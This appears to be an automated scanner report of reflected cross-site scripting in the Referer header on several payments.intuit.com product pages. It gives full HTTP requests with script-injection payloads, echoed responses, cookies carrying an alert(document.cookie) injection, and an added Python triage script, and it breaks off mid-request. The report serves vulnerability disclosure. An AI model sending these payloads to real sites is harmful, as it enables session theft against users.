Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways to make another user's browser send a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-credit-card-processing-services.jsp?scid=ips_pc90_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=f7c47--><script>alert(1)</script>3f78b487239
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fb1c'-alert(1)-'0a97bbe41af was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways to make another user's browser send a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-credit-card-processing-services.jsp?scid=ips_pc90_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=2fb1c'-alert(1)-'0a97bbe41af
Response
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=2fb1c'-alert(1)-'0a97bbe41af';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d309'-alert(1)-'98a1572654c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways to make another user's browser send a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=5d309'-alert(1)-'98a1572654c
Response
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=5d309'-alert(1)-'98a1572654c';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 43536--><script>alert(1)</script>5f48ddc4902 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways to make another user's browser send a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=43536--><script>alert(1)</script>5f48ddc4902
The value of the Referer HTTP header is copied into an HTML comment. The payload eb605--><script>alert(1)</script>313dcde783a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically, and the browser normally keeps the original Referer on the redirected request, so the header value still reaches the final page.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, techniques have existed that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit the XSS flaw. For the Referer header in particular, an attacker also controls the reflected value whenever the victim follows a link from an attacker-controlled page whose URL carries the payload, to the extent the victim's browser still sends the full referring URL (current referrer-policy defaults strip the path and query on cross-origin navigations). This limitation therefore only partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=eb605--><script>alert(1)</script>313dcde783a
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 193fe'-alert(1)-'288dfdb8b4d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically, and the browser normally keeps the original Referer on the redirected request, so the header value still reaches the final page.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, techniques have existed that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit the XSS flaw. For the Referer header in particular, an attacker also controls the reflected value whenever the victim follows a link from an attacker-controlled page whose URL carries the payload, to the extent the victim's browser still sends the full referring URL (current referrer-policy defaults strip the path and query on cross-origin navigations). This limitation therefore only partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=193fe'-alert(1)-'288dfdb8b4d
Response
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=193fe'-alert(1)-'288dfdb8b4d';
</script>
...[SNIP]...
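The scanner output shows where each probe landed, but the step that turns "echoed unmodified" into "exploitable" is checking that the context-breaking characters themselves survived. The 'single-quote' probe works because the rendered statement becomes the string 'http://...q=193fe' minus alert(1) minus '288dfdb8b4d', a syntactically valid expression that calls alert() while being evaluated; the comment probe works only if --> reaches the page unencoded while a comment is still open. The following Python is an added example, not part of the original report and not the target's code. The response bodies it inspects are constructed: the script body is rebuilt from the snippet above, the HTML-comment body is invented outright because the report shows no body for those findings, and the hex bracketing values are the report's own.

```python
"""Classify where a bracketed probe reflected from the Referer header landed in
a response body and whether the context-breaking characters survived.
Added example: not part of the original report or of the target's code."""
import re


def locate(body: str, prefix: str, suffix: str):
    """Return (offset, echoed_text) for the first prefix...suffix pair, or None.
    The scanner brackets each probe with random hex so the reflection can be
    pinned down exactly; prefix/suffix are those bracketing values."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), body, re.S)
    return (m.start(), m.group(1)) if m else None


def _unclosed_before(body: str, pos: int, opener: str, closer: str) -> bool:
    """True if the nearest `opener` before pos is not followed by `closer`
    anywhere between it and pos (i.e. pos is still inside that construct)."""
    opens = [m.start() for m in re.finditer(re.escape(opener), body[:pos], re.I)]
    if not opens:
        return False
    return re.search(re.escape(closer), body[opens[-1]:pos], re.I) is None


def classify(body: str, prefix: str, suffix: str) -> dict:
    """Report the reflection context and whether each breakout actually works.
    js_string_break: inside <script> and the probe's leading quote reached the
    page as a bare quote (a hardened page shows \\' or \\u0027 instead); this
    assumes the probe's quote matches the sink's, as the scanner arranges.
    comment_break: inside an open <!-- comment and '-->' reached the page."""
    hit = locate(body, prefix, suffix)
    if hit is None:
        return {"reflected": False, "js_string_break": False, "comment_break": False}
    pos, echoed = hit
    in_script = _unclosed_before(body, pos, "<script", "</script")
    in_comment = _unclosed_before(body, pos, "<!--", "-->")
    return {
        "reflected": True,
        "echoed": echoed,
        "in_script": in_script,
        "in_comment": in_comment,
        "js_string_break": in_script and echoed.startswith(("'", '"')),
        "comment_break": in_comment and "-->" in echoed,
    }


def verdict(body: str, prefix: str, suffix: str) -> str:
    """One-line triage of a finding."""
    r = classify(body, prefix, suffix)
    if not r["reflected"]:
        return "not reflected"
    if r["js_string_break"]:
        return "exploitable: JavaScript string breakout"
    if r["comment_break"]:
        return "exploitable: HTML comment breakout"
    return "reflected but context-breaking characters did not survive"


# Constructed from the report's response snippet: raw Referer inside a
# single-quoted JavaScript string.
VULN_JS_BODY = """<html><head><script>
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=193fe'-alert(1)-'288dfdb8b4d';
</script></head><body></body></html>"""

# Constructed outright (the report shows no body for the comment findings):
# the same header echoed inside an HTML comment.
VULN_COMMENT_BODY = """<html><head>
<!-- referer: http://www.google.com/search?hl=en&q=eb605--><script>alert(1)</script>313dcde783a -->
</head><body></body></html>"""

# Constructed hardened variant: the quote arrives backslash-escaped, so the
# probe stays inside the string literal and nothing executes.
SAFE_JS_BODY = VULN_JS_BODY.replace("193fe'-alert(1)-'288dfdb8b4d",
                                    "193fe\\'-alert(1)-\\'288dfdb8b4d")

if __name__ == "__main__":
    print(verdict(VULN_JS_BODY, "193fe", "288dfdb8b4d"))
    print(verdict(VULN_COMMENT_BODY, "eb605", "313dcde783a"))
    print(verdict(SAFE_JS_BODY, "193fe", "288dfdb8b4d"))
```

To run this against a live finding, fetch the page with the probe in the Referer header and redirects followed (the report notes a redirect precedes several of these responses), then pass the final body to verdict() with the same bracketing values that were sent.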
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71edb'-alert(1)-'6b7e8734b5b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically, and the browser normally keeps the original Referer on the redirected request, so the header value still reaches the final page.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, techniques have existed that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit the XSS flaw. For the Referer header in particular, an attacker also controls the reflected value whenever the victim follows a link from an attacker-controlled page whose URL carries the payload, to the extent the victim's browser still sends the full referring URL (current referrer-policy defaults strip the path and query on cross-origin navigations). This limitation therefore only partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/ach.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=71edb'-alert(1)-'6b7e8734b5b
Response
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=71edb'-alert(1)-'6b7e8734b5b';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 9b18e--><script>alert(1)</script>e7e01249c3c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically, and the browser normally keeps the original Referer on the redirected request, so the header value still reaches the final page.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, techniques have existed that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit the XSS flaw. For the Referer header in particular, an attacker also controls the reflected value whenever the victim follows a link from an attacker-controlled page whose URL carries the payload, to the extent the victim's browser still sends the full referring URL (current referrer-policy defaults strip the path and query on cross-origin navigations). This limitation therefore only partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/ach.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=9b18e--><script>alert(1)</script>e7e01249c3c
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7408f'-alert(1)-'85140b02fc7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically, and the browser normally keeps the original Referer on the redirected request, so the header value still reaches the final page.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, techniques have existed that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit the XSS flaw. For the Referer header in particular, an attacker also controls the reflected value whenever the victim follows a link from an attacker-controlled page whose URL carries the payload, to the extent the victim's browser still sends the full referring URL (current referrer-policy defaults strip the path and query on cross-origin navigations). This limitation therefore only partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/credit-card-processing-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=7408f'-alert(1)-'85140b02fc7
Response
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=7408f'-alert(1)-'85140b02fc7';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload ee311--><script>alert(1)</script>ebc26ad0fcf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically, and the browser normally keeps the original Referer on the redirected request, so the header value still reaches the final page.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, techniques have existed that use client-side technologies such as Flash to make another user's browser send a request containing an arbitrary HTTP header; where such a technique is available, it can probably be leveraged to exploit the XSS flaw. For the Referer header in particular, an attacker also controls the reflected value whenever the victim follows a link from an attacker-controlled page whose URL carries the payload, to the extent the victim's browser still sends the full referring URL (current referrer-policy defaults strip the path and query on cross-origin navigations). This limitation therefore only partially mitigates the impact of the vulnerability.
Request
GET /products/quickbooks-payment-solutions/credit-card-processing-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
